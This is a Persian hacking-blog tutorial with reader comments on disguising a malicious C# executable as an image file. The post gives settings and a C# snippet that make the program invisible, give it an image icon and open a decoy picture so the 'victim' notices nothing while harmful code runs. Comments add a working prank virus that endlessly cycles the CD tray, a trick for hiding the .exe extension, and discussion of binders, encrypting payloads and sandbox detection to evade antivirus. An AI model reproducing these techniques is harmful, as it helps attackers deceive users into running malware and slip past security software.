مخفی شدن ویروس پشت عکس :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۶ ارديبهشت ۰۳، ۱۶:۱۵ - hidden
    test

خیلی جاها سوال شده بود که چطور ویروس رو درون عکس مخفی کنیم و وقتی قربانی روی عکس کلیک کرد عکس نمایش داده بشه و در همون حین بدون اینکه قربانی متوجه شه ویروس مون هم شروع به کار کنه

باید بگم این اتفاق شدنی نیست

یعنی ما نمیتونیم درون یه عکس ویروس جاسازی کنیم

ولی میتونیم نمای یه ویروس رو به عکس تبدیل کنیم

برم سر اصل مطلب

یه پروژه سی شارپ استارت کنید

میشه به هر زبانی نوشت ولی چون من با سی شارپ صمیمی هستم میگم سی شارپ یوقت ناراحت نشه :)

در این پروژه ما یه پیکچر باکس داریم که عکس توی خودش داره

آی کن پروژه رو شبیه آی کن تصاویر ویندوز میکنیم (ظاهر کار)

خود پروژه رو با روش هایی که تو پست قبلی هم گفتم مخفیش میکنیم (قایم شدن ویروس)

باید یجوری به برنامه دستور بدیم که وقتی برنامه یا ویروسمون اجرا شد عکس درون پیکچر باکس رو به کمک برنامه نمایش عکس ویندوز نمایش بده

این کار با کدهای سی شارپ بصورت مستقیم شدنی نیست (حداقل من نمیتونم )

بصورت مستقیم شدنی نیست پس بصورت غیر مستقیم شدنیش میکنیم :)

به عکس زیر دقت کنید

پروژه رو استارت کردم یه عکس هم بهش اضافه کردم و ....

خوب این ظاهر فرممون

حالا باید توی تنظیمات فرم باید قسمت های زیر رو دستکاری کنیم

1 - مقدار Opacity رو به 0% تغییر بدین

2 - مقدار Show in Taskbar رو به False تغییر بدین

3 - آی کن پروژه رو آی کن تصویر ویندوز تغییر بدین (در آخر این آی کن رو قرار میدم)

خوب قیافه ویروسمونم خوشگل شد :)

حالا بریم سراغ کد نویسی

روی فرم دوبار کلیک کنید تا برین صفحه کدها

تکه کد زیر رو به قسمت Form Load اضافه کنید

pictureBox2.Image.Save(@"d32.png", System.Drawing.Imaging.ImageFormat.Png);
System.IO.File.SetAttributes(@"d32.png", System.IO.FileAttributes.Hidden);
System.Diagnostics.Process.Start(@"d32.png");

اگه دقت کرده باشین گفتم از روش غیر مستقیم استفاده میکنیم

اینجا عکس درون پیکچر باکسمون رو کنار ویروس ذخیره کردیم (خط اول)

بعد دستور دادیم این عکس رو مخفی کنه (خط دوم)

در نهایت هم دستور نمایش این عکس رو به کمک برنامه ویندوز 

(هر برنامه ای که کاربر قبلا برای دیدن عکس هاش تنظیم کرده باشه)

رو دادیم (خط سوم)

همین :)

و اینکه کتابخونه های لازم رو به دلیل کمبود حوصله تو قسمت Using اضافه نکردم و درون خود کدها نوشتم

این کلیّت مخفی شدن ویروس پشت تصویر بود

حالا میشه بعد از این خط ها دستورات مخرب مورد نیاز مشتریمون (قربانی) رو اضافه کرد :)

باشد که رستگار شود و رستگار شویم

برنامه ای که پایین قرار میدم برنامه ایه که طی این آموزش ساختم

کد مخرب نداره و مقدار Opacity هم صفر نیست و میتونید تست کنید و ببینین چیه


دریافت
حجم: 440 کیلوبایت

نظر (۳۷)

مثل همیشه عالی
مثل همیشه مفید و حالب ممنون از زحماتتون
خوش برگشتی:)
Virus32 Virus 32 :
ممنون
  • Virus32
  • میلاد مقیسه
  • سلام داداش سایتتد دیدم عالی بود عاشقش شدم اگه میشه رمز هارو برای منم بفرستید ممنون
    سلام داداش ویروس
    داداش یه سوال داشتم ممنون میشم جواب بدی
    داداش امکانش هست تو سی شارپ یه فایل با پسوند exe رو تو حافظه ی برناممون قرار بدیم ( تو قسمت Resource ) و بعد از همونجا فراخانی کنیم؟؟
    مثلا من یع فایل با پسوند Exe تو برنامم بزرام ، بعد از طریق procces.start همونو فراخوانی کنم ؟؟؟؟؟؟
    Virus32 Virus 32 :
    سلام عزیز
    تا حالا این کار رو انجام ندادم
    در کل تا جایی که من میدونم اگه قرار هم بدی باید کنار فایل اصلیت باشه
    برای افزودن برنامه دیگه به پروژه ات
    روی اسم پروژه توی لیست سمت راست کلیک راست کن و روی Add >> Existing Item کلیک کن
    در صفحه باز شده لیست کشویی رو روی Executable Files قرار بده و نرم افزارت رو انتخاب کن
    برای فراخوانیش هم که از کد زیر استفاده میکنیم
    Process.Start("name.exe");
    من همین قدر بلدم ولی احتمالا روش دیگه ای هم باید باشه که برنامه رو مثل تصاویر و بقیه فایل ها درون متن برنامه اصلی قرار بده
    با عرض سلام
    خدمت virus32
    خواسته ایی از شما داشتم
    میخواستم اگه میشه
    چندتا کتاب برام معرفی کنین
    هم برای اشنایی با اصطلاهات هک
    هم اموزش زبانهای برنامه نویسی سی شارپ سی ++
    Html و..
    اگه میشه لینک دانلودشون رو برام بزارین
    میخوا اموزش ببینم ولی اول میخوام به کتاب ها مسلط بشم اگه میشه کتاب های خوبی رو برام بگین

    من همون viruss22 هستم داش
    دوباره با سرزدن به وبسایتت اشتیاقم برای اموزش هک و امنیت زیاد شده
    ممنون میشم زودتر بهم بگی

    با تشکر فراوان MV
    Virus32 MR_C0D3R ‌ :
    سلام خوشحالم که مجدد میخوای استارت کار رو بزنی ، کتاب های آموزش سی شارپ و سی پلاس پلاس قبلا تو وب قرار گرفته که میتونی از اینجا و اینجا دانلودشون کنی ولی برای اچ تی ام ال هم در آینده ای نه چندان دور یه کتاب قرار میدم که میتونی دانلود کنی ، برای اصطلاحات هم همین اصطلاحاتی که کم کم داریم توی وب قرار میدیم آشنا باشی کافیه ، موفق باشی .
    ببخشید برنامه ای برای جایگزین کردن ویژوال هست ممنون از سایت خوبتون اقا ویروسه
    Virus32 MR_C0D3R ‌ :
    راستش سوالتو خوب متوجه نشدم ای کاش یه خرده واضح تر میپرسیدی

    اگه منظورت اینه که جای ویژوال استودیو چیز دیگه ای رو میخوای استفاده کنی ، بله میشه و وجود داره 

    البته مثل ویژوال استودیو نیست که بخواد بیشتر زبان هارو داخل خودش جا بده
    سلام اگه میشه اسمش رو بگید و لینک دانلودش رو قرار بدین
    Virus32 MR_C0D3R ‌ :
    سلام ، اسم و لینک دانلود چیو ؟
    همون برنامه ای که تو پست بالایی گفتیت که جایگیزن ویژواله
    Virus32 MR_C0D3R ‌ :
    لینکش رو برات قرار میدم ولی امکان تغییرش هست ، اگه خدایی نکرده تغییر کرد ، توی گوگل سرچ بزن Visual C# 2005 زیاد با ورژنای دیگش فرقی نداره و میتونی داخلش راحت کد بزنی ، البته این الان برای سی شارپه همونطور که از اسمش مشخصه ، اگه زبان دیگه ای خواستی بگو بهت میگم من خودم از این برای سیستمای قدیمیم قبلا استفاده میکردم خوب جواب میداد ( حتی ویندوز اکس پی ) پس راحت میتونی ازش بدون هیچ مشکلی استفاده کنی
    ممنون دوست عزیز فقط این پیکچر باکس هم داره
    Virus32 MR_C0D3R ‌ :
    آره عزیز همه چیزش کامله
    اگه میشه لینکش رو قرار بدید چون یه چیزی اورد دانلود کردم نصب نشد
    Virus32 MR_C0D3R ‌ :
    الان فایله رو مگه دانلود نکردی ؟ نصبش کن اگه  نشد و ارور داد اسکرین شات بده بررسیش کنم بهت بگم با اینترنت دانلود منیجر دانلود کردی ؟
    salam
    age mishe darbare ye linux ham post bezarid
    Virus32 MR_C0D3R ‌ :
    Ok
    نه از گوگل.کلا کامپیوتر هنگ میکنه
    Virus32 MR_C0D3R ‌ :
    میتونی یه اسکرین شات از مشخصات سخت افزار سیستمت ارسال کنی ؟ چون این برنامه رو من روی هر سیستمی اجرا میکردم ، شاید سخت افزارت خیلی ذغالیه که هنگ میکنه یا یه خرده بیشتر از حد سنگینش کردی D :
    رم من توی سیستم قدیمیم یه گیگ بود و سی پی یوم تک هسته ، سخت افزارت از این پایین تره ؟
    راستی برنامه نصب میشه و وقتی واردش میشی هنگ میکنه ؟
    دانلود کردم ولی از گوگل
    رمم ۸.سیپیوم۲ هسته.گرافیکم ۲.وسط نصب هنگ میکنه.
    Virus32 MR_C0D3R ‌ :
    والا چیزی به ذهنم نمیرسه :( ، تو موارد دیگه هم اینجوری میشه ؟ اگه اینجوری میشه پشت کیستو باز کن اگه دو تا رم داشت یکیشو در بیار تست کن اگه بازم هنگ کرد از ویژوال استودیو های دیگه استفاده کن ، همینایی که باهاشون آموزش درست میکنیم مثل همین پست ، اگه هنگ کرد که من نمیدونم باید چیکار کنی در غیر اینصورت به دنیای سی شارپ خوش اومدی :)
    اخه ویژوال استدیو رو یبار دانلود کردم اومدم نصبش کنم باز میگفت باید یه فایلی رو دانلود کنی.اگه راهی هست که دانلودش نکنم بگید.ممنون
    Virus32 MR_C0D3R ‌ :
    حجم اون برنامه که دانلود کرده بودی چند مگ بود ؟ چون بعضی از برنامه هایی که کم حجمن وقتی واردشون میشی ، یبار هم باید کامپایلر زبان مورد نظرت رو دانلود کنی ، احتمالا از اونا دانلود کردی 
    ۱۴مگ
    Virus32 MR_C0D3R ‌ :
    پس از هموناست که بهت گفتم
    آنتی ویرویس بهش ارور میده و پاکش میکنه :/
    ویژوال 2015 بهتره یا 2008؟
    Virus32 MR_C0D3R ‌ :
    نظری ندارم
    سلام بر بهترین ویروس برای کمک های قبی دستت درد نکنه راستی چجوری علامت exe را ورداشتی ممنون میشم بگی باز هم ممنون
    از سایت خوبت♥♥♥♥♥♥♥♥♥♥
    Virus32 MR_C0D3R ‌ :
    سلام عزیز
    میتونیم یه اسم طولانی برای فایل در نظر بگیریم 
    اینجوری سه نقطه قرار میگیره + پسوند فایل
    البته بعضی مواقع میبینی سیستم کاربر پسوند فایل هارو نشون نمیده
    بخاطر همین png. ساختگی ما به نمایش در میاد
    داداش دستت درد نکنه من با این یک ویروس نوشتم که سی دی رام را باز میکنه عشقی کدشم اینه




    using System;
    using System.Collections.Generic;
    using System.ComponentModel;
    using System.Data;
    using System.Drawing;
    using System.Linq;
    using System.Text;
    using System.Threading.Tasks;
    using System.Windows.Forms;
    using System.Runtime.InteropServices;

    namespace عکس_ویروسی
    {
    public partial class Form1 : Form
    {
    public Form1()
    {
    InitializeComponent();

    }
    [DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
    public static extern void mciSendStringA(string lpstrCommand,
    string lpstrReturnString, int uReturnLength, IntPtr hwndCallback);

    private void Form1_Load(object sender, EventArgs e)
    {
    pictureBox1.Image.Save(@"d32.png", System.Drawing.Imaging.ImageFormat.Png);
    System.IO.File.SetAttributes(@"d32.png", System.IO.FileAttributes.Hidden);
    System.Diagnostics.Process.Start(@"d32.png");
    for (; ; )
    {
    mciSendStringA("set CDAudio door open", "", 0, IntPtr.Zero);
    mciSendStringA("set CDAudio door closed", "", 0, IntPtr.Zero);
    }


    }
    }
    }


    خواستی
    ♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
    ♥♥♥ عشقی !!!!!!!!!! ♥♥♥
    ♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
    Virus32 MR_C0D3R ‌ :
    موفق باشی :)
    سلام منم دوباره میتونی کاری کنی که فایل دیگه ایکون exe نداشته نباشه و بهجاش عکس باشه مرسی و
    تو کد بالا 1 کد اضافه کردم اما میتونی بگی چجوری 2 تا کد با هم اجرا شه
    کد اضافه شده :
    Console.Beep(32, 32);
    32 را خودت تعقیر بده که ویروس شه
    ♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
    Virus32 MR_C0D3R ‌ :
    سلام
    میتونی عکس رو تبدیل کنی به آیکون ( با برنامه یا آنلاین )
    بعدا تو ویژگی های فورمت برو به قسمت Icon و بعد از کلیک ... مسیر آیکونت رو انتخاب کن
    میتونی آیکون تصاویر ویندوز رو هم بزاری ....
    دومی رو متوجه نشدم :(

    سلام مهندس لینک دانلود خرابه .

    سلام.دانلودش نمیکنه که

  • Virus32
  • مسلم حسامی
  • چرا برای دانلود اررور می ده خواهشن جواب بدید

     

    Virus32 MicRoB 32 :
    داداش پست مال 3 سال پیشه، بیشتر چیزارو هم متنی اموزش داده و فک نکنم جاییش نیاز به عکس داشته باشه ولی به هر حال اگه شد درستش می کنیم
    پ ن: بالاخره کامنت ها تایید میشن لازم نیست وقتی می بینی کامنتت دیر تایید میشه با اسم های دیگه ای کامنت بزاری 
  • Virus32
  • مسلم حسامی
  • مرسی لطف می کنید.ولی من با اسم خوددم پیام دادم.بازم ممنون میشم درست کنید.بعد یه سوال دیگه هم داشتم این برای هرنوع فایک کار می کنه؟مثلا به جای عکس pdf یا چیز دیگه ای باشه؟

     

    Virus32 MicRoB 32 :
    برای هر نوع فایل فرق داره 
    مثلا اگه بخوای pdf باشه باید برنامه رو جوری بنویسی که به جای ویندوز مدیا پلیر مقلا یه pdf خوان باز بشه یا...

    سلام دوست عزیزم ---> ایدین

    عزیزم اگه سی شارپ بلدی میتونی کدشو بنویسی و خودت به دلخواه تغییرش بدی
    که خیلی هم به صرفه تره تا فایل رو دانلود کنی

    هم یاد میگیری هم واسه خودت خوبه و برنامه نویسی رو یاد میگیری

    از نظر من سی شارپ رو یاد بگیر اموزش زیادی در این وب و وبسایت های  دیگه هست

    موفق باشی عزیز

  • Virus32
  • مسلم حسامی
  • micro32 جان لطف می کنی لینک دانلود رو درست کنید؟

    Virus32 ولم کنید (: :
    فعلا معذوریم باید نویسنده ی پست بیاد. پروژه رو خودتون بنویسید این لینک دانلود مال سورس نیستش یه فایل اجرایی نمونه است.

    سلام ویروس جان. می خوام چند تا فایل از کاربر بگیرم و خروجی exe بده.و وقتی فایل exe اجراش کنم همه فایل ها یوزر  اجرا بشن

    Virus32 ولم کنید (: :
    باید بایندر بنویسی

    چطوری؟ کدی داری از روش یاد بگیرم.؟

    Virus32 MR_C0D3R ‌ :
    منکه نفهمیدم چی میخوای
    ولی چیزی که اتریب گفت ( بایندر )
    نمونه کدهاش تا دلت بخواد زیاده و فقط باید بگی به چه زبونی میخوای
    مثلا یه نمونش اینه که به زبان سی شارپ

    اره مثل همچین کدی ولی قابل تشخیص آنتی ویروس نباشه.اینارو همرو میگیره

    Virus32 ولم کنید (: :
    خب دیگه باید انتی ویروس رو دور بزنی

    چجوری تو سی شارپ اینکارو بکنم

    Virus32 ولم کنید (: :
    جلل خالق!

    جواب جالبی بود .شما وقتی می خوای بایندر رو غیر قابل تشخیص بدی یا باید base64 یا با aes یا rsa رمزنگاری کنی دور زدن انتی ویروس چجوری؟گفتنش قشنگه

    Virus32 ولم کنید (: :
    به قول نیموس:
    وقتی برنامه ات توی سند باکس بره رمزگزاریت لو میره و آنتی ویروس تشخیصش میده (:

    خوب راحش چیه؟شما گفتید جلل خالق یعنی چی منظور خیلی سادست یا ...

    Virus32 ولم کنید (: :
    نه من منظور شما رو اشتباه فهمیدم فک کردم یه چیز دیگه رو میگی!
    راهش رو نمیدونم والا ، باید برنامه ات رو طوری ترتیب بدی که تشخیص بده تو سند باکس داره اجرا میشه یا سیستم واقعی! که اونم وقتی آنتی ویروس ببینه برنامه ات اینا رو داره تشخیص میده باز ویروس تلقی میکنه :| چون فقط ویروسا اینا رو میخوان!

    مرسی .یه سوال مسخره هر چی گشتم پیدا نکردم. می خوام ایکون روی یه فایل exe بزارم اما با propertise نه .از user ایکون بگیره و بزاره روی exe .می خوام با برنامه نویسی سی شارپ انجام بدم

    Virus32 ولم کنید (: :
    باید از این و این کمک بگیرید.

    سلام

    من نرم افزار انکریپتر فایل های پایتونی نوشتم :|

    هر چی باشه رو انکریپت میکنه و میندازه توی یه فایل پایتونی دیگه. یک دیکریپتر داره که اونو دیکریپت میکنه و یک exec گذاشتم که اونو اجرا کنه. کلیدشم 2 بار رمزنگاری شده. حالا یک سوال اساسی

    این شناسایی میشه؟؟ نخواستم بندازم تو سند باکس و چمیدونم ویروس توتال و اینا و دیفندر هم نخواستم اجرا کنم. پس روی یه ویندوز 7 زپرتی ساختمش و الان پرسیدم

    ضمنا تابعی داریم بیاد کد های exe رو به اسمبلی تبدیل کنه؟ همچنین میشه با پایتون بیایم بایند کنیم؟؟:) سوالم خیلی رویاییه =))

     

    ضمنا گفتم تو همین پیام هم جواب کدر رو بدم. من نرم افزار هک نمیخوام بزنم. دارم دستیار سیستم میزنم :) فعلا دوست دارم اوپن سورس بدمش و میخوام برای نصبش هم مانعی نباشه و توی استارتاپ که اجرا میکنم یک فایل بچ رو اون صفحهه نمایش داده نشه. و فکر نمیکنم بشه کاری کرد که یک بار exe کنیم و دفعه های بعدی دیگه این مشکل پیش نیاد

    Virus32 ولم کنید (: :
    شناسایی میشه! من یه بار یه باج افزار اینجوری ساختم گزاشتم ویروس توتال همه نوشتن py.ranson :|
    2- همچین تابعی نیست باید از کرکر ها کمک بگیری...پ ن : نه پایتون هیچ وقت نمیتونه کامپایل کنه...
    3- منظورت رو نگرفتم :|

    atrtrib جان این دوم صفحه اش موجود نیست

    Virus32 ولم کنید (: :
    آره، نویسنده ی پست من نیستم، عکسش انگار حذف شده...
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی